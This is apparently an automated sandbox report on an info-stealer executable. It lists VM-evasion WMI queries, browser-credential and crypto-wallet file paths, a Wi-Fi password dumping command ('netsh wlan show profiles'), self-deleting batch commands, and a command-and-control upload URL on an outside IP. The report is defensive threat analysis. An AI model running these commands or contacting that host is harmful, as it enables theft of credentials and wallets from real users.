          Source: C:\Users\user\Desktop\bPkG0wTVon.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Model, Size FROM Win32_DiskDrive
          Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, MACAddress, Speed FROM Win32_NetworkAdapter WHERE MACAddress IS NOT NULL
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Description, MACAddress, IPEnabled FROM Win32_NetworkAdapterConfiguration WHERE IPEnabled = TRUE
          Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Speed FROM Win32_PhysicalMemory
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Capacity FROM Win32_PhysicalMemory
          Queries sensitive printer information (via WMI, Win32_Printer, often done to detect virtual machines)
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, Default FROM Win32_Printer
          Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT DeviceID, FileSystem, FreeSpace, Size FROM Win32_LogicalDisk WHERE DriveType = 3
          Queries sensitive sound device information (via WMI, Win32_SoundDevice, often done to detect virtual machines)
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_SoundDevice
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeMemory allocated: 26A0000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeMemory allocated: 2830000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeMemory allocated: 4830000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeWindow / User API: threadDelayed 9949Jump to behavior
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Manufacturer, Product FROM Win32_BaseBoard
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT SMBIOSBIOSVersion FROM Win32_BIOS
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Product, Manufacturer, SerialNumber FROM Win32_BaseBoard
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Manufacturer, SMBIOSBIOSVersion, ReleaseDate FROM Win32_BIOS
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_ComputerSystem
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, NumberOfCores, MaxClockSpeed FROM Win32_Processor
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: bPkG0wTVon.exeBinary or memory string: IsRunningInVirtualMachine1
          Source: bPkG0wTVon.exe, 00000000.00000002.1495190259.0000000002872000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qemu-ga
          Source: bPkG0wTVon.exeBinary or memory string: IsRunningInVirtualMachine2
          Source: bPkG0wTVon.exeBinary or memory string: IsVirtualMachine
          Source: Amcache.hve.24.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
          Source: bPkG0wTVon.exeBinary or memory string: qemu-ga#SPICE Guest Tools
          Source: bPkG0wTVon.exe, 00000000.00000002.1493209045.0000000000B01000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          barindex
          .NET source code references suspicious native API functions
          Source: bPkG0wTVon.exe, Killer.csReference to suspicious API methods: OpenProcess(1u, (byte)bInheritHandle != 0, processId)
          Source: bPkG0wTVon.exe, ImportHider.csReference to suspicious API methods: LoadLibrary(dllName)
          Source: bPkG0wTVon.exe, ImportHider.csReference to suspicious API methods: GetProcAddress(intPtr, methodName)
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c tasklistJump to behavior
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd" /C chcp 65001 && netsh wlan show profiles | findstr AllJump to behavior
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Local\Temp\tmp6122.tmp.bat & Del C:\Users\user\AppData\Local\Temp\tmp6122.tmp.batJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profilesJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr AllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe TaskKill /F /IM 8592Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe Timeout /T 2 /NobreakJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe TaskKill /F /IM 8592Jump to behavior
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeQueries volume information: C:\Users\user\Desktop\bPkG0wTVon.exe VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Lowering of HIPS / PFW / Operating System Security Settings

          barindex
          Uses netsh to modify the Windows network and firewall settings
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profiles
          Source: Amcache.hve.LOG1.24.dr, Amcache.hve.24.drBinary or memory string: msmpeng.exe
          Source: Amcache.hve.LOG1.24.dr, Amcache.hve.24.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
          Source: Amcache.hve.24.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.2107.4-0\msmpeng.exe
          Source: bPkG0wTVon.exe, 00000000.00000002.1503654046.0000000005320000.00000004.00000020.00020000.00000000.sdmp, bPkG0wTVon.exe, 00000000.00000002.1506746297.0000000007762000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: V%ProgramFiles%\Windows Defender\MsMpeng.exe
          Source: bPkG0wTVon.exe, 00000000.00000002.1507851310.0000000007875000.00000004.00000020.00020000.00000000.sdmp, bPkG0wTVon.exe, 00000000.00000002.1503654046.0000000005320000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
          Source: Amcache.hve.LOG1.24.dr, Amcache.hve.24.drBinary or memory string: MsMpEng.exe
          Source: bPkG0wTVon.exe, 00000000.00000002.1495190259.0000000002872000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: pathToSignedReportingExe: %ProgramFiles%\Windows Defender\MsMpeng.exe
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

          Stealing of Sensitive Information

          barindex
          Found many strings related to Crypto-Wallets (likely being stolen)
          Source: bPkG0wTVon.exe, 00000000.00000002.1495190259.0000000002872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Electrum
          Source: bPkG0wTVon.exe, 00000000.00000002.1495190259.0000000002872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: $}qTC:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldbt-}q
          Source: bPkG0wTVon.exe, 00000000.00000002.1495190259.0000000002872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: $}q4C:\Users\user\AppData\Roaming\Exodus\exodus.wallett-}q
          Source: bPkG0wTVon.exe, 00000000.00000002.1495190259.0000000002872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: $}q1C:\Users\user\AppData\Roaming\Ethereum\keystoret-}q
          Source: bPkG0wTVon.exe, 00000000.00000002.1495190259.000000000291B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ExodusWeb3 Wallet
          Source: bPkG0wTVon.exe, 00000000.00000002.1495190259.0000000002872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Ethereum
          Source: bPkG0wTVon.exe, 00000000.00000002.1495190259.0000000002872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: $}q5C:\Users\user\AppData\Local\Coinomi\Coinomi\walletst-}q
          Source: bPkG0wTVon.exe, 00000000.00000002.1495190259.0000000002872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: $}q1C:\Users\user\AppData\Roaming\Ethereum\keystoret-}q
          Tries to harvest and steal Bitcoin Wallet information
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeKey opened: HKEY_CURRENT_USER\Software\Bitcoin\Bitcoin-QtJump to behavior
          Tries to harvest and steal WLAN passwords
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd" /C chcp 65001 && netsh wlan show profiles | findstr All
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profiles
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd" /C chcp 65001 && netsh wlan show profiles | findstr AllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profilesJump to behavior
          Tries to harvest and steal browser information (history, passwords, etc)
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\cookies.sqliteJump to behavior
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.ldbJump to behavior
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000004.logJump to behavior
          Tries to steal Mail credentials (via file / registry access)
          Source: C:\Users\user\Desktop\bPkG0wTVon.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
          Source: Yara matchFile source: 00000000.00000002.1495190259.0000000002872000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: bPkG0wTVon.exe PID: 8592, type: MEMORYSTR

          Mitre Att&ck Matrix

          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity Information1
          Scripting          		Valid Accounts841
          Windows Management Instrumentation          		1
          Scripting          		1
          DLL Side-Loading          		111
          Disable or Modify Tools          		1
          OS Credential Dumping          		1
          File and Directory Discovery          		Remote Services1
          Archive Collected Data          		1
          Ingress Tool Transfer          		Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault Accounts1
          Native API          		1
          DLL Side-Loading          		11
          Process Injection          		2
          Obfuscated Files or Information          		LSASS Memory135
          System Information Discovery          		Remote Desktop Protocol2
          Data from Local System          		1
          Encrypted Channel          		Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)2
          Software Packing          		Security Account Manager941
          Security Software Discovery          		SMB/Windows Admin Shares1
          Email Collection          		11
          Non-Standard Port          		Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
          DLL Side-Loading          		NTDS63
          Virtualization/Sandbox Evasion          		Distributed Component Object Model1
          Clipboard Data          		3
          Non-Application Layer Protocol          		Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script63
          Virtualization/Sandbox Evasion          		LSA Secrets3
          Process Discovery          		SSHKeylogging3
          Application Layer Protocol          		Scheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
          Process Injection          		Cached Domain Credentials1
          Application Window Discovery          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync1
          System Network Configuration Discovery          		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1578055 Sample: bPkG0wTVon.exe Startdate: 19/12/2024 Architecture: WINDOWS Score: 100 42 245.246.1.0.in-addr.arpa 2->42 44 icanhazip.com 2->44 50 Suricata IDS alerts for network traffic 2->50 52 Antivirus / Scanner detection for submitted sample 2->52 54 Sigma detected: Capture Wi-Fi password 2->54 56 6 other signatures 2->56 8 bPkG0wTVon.exe 15 31 2->8         started        signatures3 process4 dnsIp5 46 89.23.100.233, 1490, 49718 MAXITEL-ASRU Russian Federation 8->46 48 icanhazip.com 104.16.184.241, 49717, 80 CLOUDFLARENETUS United States 8->48 58 Queries sensitive battery information (via WMI, Win32_Battery, often done to detect virtual machines) 8->58 60 Queries sensitive sound device information (via WMI, Win32_SoundDevice, often done to detect virtual machines) 8->60 62 Queries sensitive printer information (via WMI, Win32_Printer, often done to detect virtual machines) 8->62 64 11 other signatures 8->64 12 cmd.exe 1 8->12         started        15 cmd.exe 1 8->15         started        17 WerFault.exe 21 16 8->17         started        20 cmd.exe 1 8->20         started        signatures6 process7 file8 66 Uses netsh to modify the Windows network and firewall settings 12->66 68 Tries to harvest and steal WLAN passwords 12->68 22 tasklist.exe 1 12->22         started        24 conhost.exe 12->24         started        26 netsh.exe 2 15->26         started        28 conhost.exe 15->28         started        30 findstr.exe 1 15->30         started        32 chcp.com 1 15->32         started        40 C:\ProgramData\Microsoft\...\Report.wer, Unicode 17->40 dropped 34 taskkill.exe 1 20->34         started        36 conhost.exe 20->36         started        38 2 other processes 20->38 signatures9 process10

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          bPkG0wTVon.exe31%VirustotalBrowse
          bPkG0wTVon.exe100%AviraHEUR/AGEN.1310131
          bPkG0wTVon.exe53%ReversingLabsByteCode-MSIL.Backdoor.FormBook
          bPkG0wTVon.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          No Antivirus matches

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://89.23.100.233:1490t-0%Avira URL Cloudsafe
          http://beta.visualstudio.net/net/sdk/feedback.asp0%Avira URL Cloudsafe
          http://89.23.100.233:1490/upload0%Avira URL Cloudsafe
          http://89.23.100.233:14900%Avira URL Cloudsafe
          http://89.23.100.233:1490/upload?File0%Avira URL Cloudsafe
          http://upx.sf.net0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          icanhazip.com
          		104.16.184.241
          		truefalse
            		high
            245.246.1.0.in-addr.arpa
            		unknown
            		unknowntrue
              		unknown

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              http://icanhazip.com/false
                		high
                http://89.23.100.233:1490/uploadtrue
                • Avira URL Cloud: safe
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://beta.visualstudio.net/net/sdk/feedback.aspbPkG0wTVon.exe, 00000000.00000002.1512294678.00000000702F1000.00000020.00000001.01000000.00000007.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://ac.ecosia.org/autocomplete?q=tmp919C.tmp.dat.0.drfalse
                  		high
                  https://www.google.com/images/branding/product/ico/googleg_alldp.icobPkG0wTVon.exe, 00000000.00000002.1499984783.0000000003A16000.00000004.00000800.00020000.00000000.sdmp, bPkG0wTVon.exe, 00000000.00000002.1499984783.00000000039D5000.00000004.00000800.00020000.00000000.sdmp, bPkG0wTVon.exe, 00000000.00000002.1499984783.00000000038C1000.00000004.00000800.00020000.00000000.sdmp, tmp919D.tmp.dat.0.dr, tmp919F.tmp.dat.0.dr, tmp919C.tmp.dat.0.drfalse
                    		high
                    https://duckduckgo.com/chrome_newtabbPkG0wTVon.exe, 00000000.00000002.1499984783.0000000003A16000.00000004.00000800.00020000.00000000.sdmp, bPkG0wTVon.exe, 00000000.00000002.1499984783.00000000039D5000.00000004.00000800.00020000.00000000.sdmp, bPkG0wTVon.exe, 00000000.00000002.1499984783.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, bPkG0wTVon.exe, 00000000.00000002.1499984783.00000000039FF000.00000004.00000800.00020000.00000000.sdmp, bPkG0wTVon.exe, 00000000.00000002.1499984783.0000000003A3E000.00000004.00000800.00020000.00000000.sdmp, bPkG0wTVon.exe, 00000000.00000002.1499984783.00000000038C1000.00000004.00000800.00020000.00000000.sdmp, tmp919D.tmp.dat.0.dr, tmp918A.tmp.dat.0.dr, tmp919F.tmp.dat.0.dr, tmp9189.tmp.dat.0.dr, tmp9188.tmp.dat.0.dr, tmp919C.tmp.dat.0.drfalse
                      		high
                      https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/searchbPkG0wTVon.exe, 00000000.00000002.1499984783.0000000003A16000.00000004.00000800.00020000.00000000.sdmp, bPkG0wTVon.exe, 00000000.00000002.1499984783.00000000039D5000.00000004.00000800.00020000.00000000.sdmp, bPkG0wTVon.exe, 00000000.00000002.1499984783.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, bPkG0wTVon.exe, 00000000.00000002.1499984783.00000000039FF000.00000004.00000800.00020000.00000000.sdmp, bPkG0wTVon.exe, 00000000.00000002.1499984783.0000000003A3E000.00000004.00000800.00020000.00000000.sdmp, bPkG0wTVon.exe, 00000000.00000002.1499984783.00000000038C1000.00000004.00000800.00020000.00000000.sdmp, tmp919D.tmp.dat.0.dr, tmp918A.tmp.dat.0.dr, tmp919F.tmp.dat.0.dr, tmp9189.tmp.dat.0.dr, tmp9188.tmp.dat.0.dr, tmp919C.tmp.dat.0.drfalse
                        		high
                        https://duckduckgo.com/ac/?q=tmp919C.tmp.dat.0.drfalse
                          		high
                          http://89.23.100.233:1490bPkG0wTVon.exe, 00000000.00000002.1495190259.0000000002A03000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://www.google.com/images/branding/product/ico/googleg_lodp.icobPkG0wTVon.exe, 00000000.00000002.1499984783.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, bPkG0wTVon.exe, 00000000.00000002.1499984783.00000000039FF000.00000004.00000800.00020000.00000000.sdmp, bPkG0wTVon.exe, 00000000.00000002.1499984783.0000000003A3E000.00000004.00000800.00020000.00000000.sdmp, tmp918A.tmp.dat.0.dr, tmp9189.tmp.dat.0.dr, tmp9188.tmp.dat.0.drfalse
                            		high
                            https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=bPkG0wTVon.exe, 00000000.00000002.1499984783.0000000003A16000.00000004.00000800.00020000.00000000.sdmp, bPkG0wTVon.exe, 00000000.00000002.1499984783.00000000039D5000.00000004.00000800.00020000.00000000.sdmp, bPkG0wTVon.exe, 00000000.00000002.1499984783.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, bPkG0wTVon.exe, 00000000.00000002.1499984783.00000000039FF000.00000004.00000800.00020000.00000000.sdmp, bPkG0wTVon.exe, 00000000.00000002.1499984783.0000000003A3E000.00000004.00000800.00020000.00000000.sdmp, bPkG0wTVon.exe, 00000000.00000002.1499984783.00000000038C1000.00000004.00000800.00020000.00000000.sdmp, tmp919D.tmp.dat.0.dr, tmp918A.tmp.dat.0.dr, tmp919F.tmp.dat.0.dr, tmp9189.tmp.dat.0.dr, tmp9188.tmp.dat.0.dr, tmp919C.tmp.dat.0.drfalse
                              		high
                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=tmp919C.tmp.dat.0.drfalse
                                		high
                                http://upx.sf.netAmcache.hve.24.drfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://89.23.100.233:1490/upload?FilebPkG0wTVon.exefalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://icanhazip.combPkG0wTVon.exe, 00000000.00000002.1495190259.0000000002872000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://www.ecosia.org/newtab/bPkG0wTVon.exe, 00000000.00000002.1499984783.0000000003A16000.00000004.00000800.00020000.00000000.sdmp, bPkG0wTVon.exe, 00000000.00000002.1499984783.00000000039D5000.00000004.00000800.00020000.00000000.sdmp, bPkG0wTVon.exe, 00000000.00000002.1499984783.00000000038C1000.00000004.00000800.00020000.00000000.sdmp, tmp919D.tmp.dat.0.dr, tmp919F.tmp.dat.0.dr, tmp919C.tmp.dat.0.drfalse
                                    		high
                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namebPkG0wTVon.exe, 00000000.00000002.1495190259.0000000002872000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://89.23.100.233:1490t-bPkG0wTVon.exe, 00000000.00000002.1495190259.0000000002A03000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=tmp919C.tmp.dat.0.drfalse
                                        		high
                                        https://gemini.google.com/app?q=tmp919C.tmp.dat.0.drfalse
                                          		high

                                          World Map of Contacted IPs

                                          • No. of IPs < 25%
                                          • 25% < No. of IPs < 50%
                                          • 50% < No. of IPs < 75%
                                          • 75% < No. of IPs

                                          Public IPs

                                          IPDomainCountryFlagASNASN NameMalicious
                                          89.23.100.233
                                          		unknownRussian Federation
                                          		48687MAXITEL-ASRUtrue
                                          104.16.184.241
                                          		icanhazip.comUnited States
                                          		13335CLOUDFLARENETUSfalse

                                          General Information

                                          Joe Sandbox version:41.0.0 Charoite
                                          Analysis ID:1578055
                                          Start date and time:2024-12-19 08:23:58 +01:00
                                          Joe Sandbox product:CloudBasic
                                          Overall analysis duration:0h 7m 45s
                                          Hypervisor based Inspection enabled:false
                                          Report type:full
                                          Cookbook file name:default.jbs
                                          Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                          Run name:Suspected VM Detection
                                          Number of analysed new started processes analysed:28
                                          Number of new started drivers analysed:0
                                          Number of existing processes analysed:0
                                          Number of existing drivers analysed:0
                                          Number of injected processes analysed:0
                                          Technologies:
                                          • HCA enabled
                                          • EGA enabled
                                          • AMSI enabled
                                          Analysis Mode:default
                                          Analysis stop reason:Timeout
                                          Sample name:bPkG0wTVon.exe
                                          Detection:MAL
                                          Classification:mal100.troj.spyw.evad.winEXE@25/21@2/2
                                          EGA Information:
                                          • Successful, ratio: 100%
                                          HCA Information:
                                          • Successful, ratio: 100%
                                          • Number of executed functions: 128
                                          • Number of non-executed functions: 0
                                          Cookbook Comments:
                                          • Found application associated with file extension: .exe

                                          Warnings

                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, WerFault.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                          • Excluded IPs from analysis (whitelisted): 23.55.253.34, 184.31.62.93, 20.42.65.92, 40.126.28.11
                                          • Excluded domains from analysis (whitelisted): fs.microsoft.com, onedsblobprdeus17.eastus.cloudapp.azure.com, login.live.com, e16604.g.akamaiedge.net, blobcollector.events.data.trafficmanager.net, umwatson.events.data.microsoft.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net
                                          • Not all processes where analyzed, report is missing behavior information
                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                          • Report size getting too big, too many NtOpenFile calls found.
                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                          • Report size getting too big, too many NtReadVirtualMemory calls found.
                                          • Report size getting too big, too many NtSetInformationFile calls found.

                                          Simulations

                                          Behavior and APIs

                                          TimeTypeDescription
                                          02:26:12API Interceptor78x Sleep call for process: bPkG0wTVon.exe modified
                                          02:26:24API Interceptor1x Sleep call for process: WerFault.exe modified

                                          Joe Sandbox View / Context

                                          IPs

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          89.23.100.2333gJQoqWpxb.batGet hashmaliciousUnknownBrowse
                                          • 89.23.100.233:1490/upload
                                          7fE6IkvYWf.exeGet hashmaliciousUnknownBrowse
                                          • 89.23.100.233:1490/upload
                                          T05Dk6G8fg.exeGet hashmaliciousUnknownBrowse
                                          • 89.23.100.233:1488/upload
                                          3K5MXGVOJE.exeGet hashmaliciousUnknownBrowse
                                          • 89.23.100.233:1489/upload
                                          VaXmr82RIb.exeGet hashmaliciousUnknownBrowse
                                          • 89.23.100.233:1488/upload
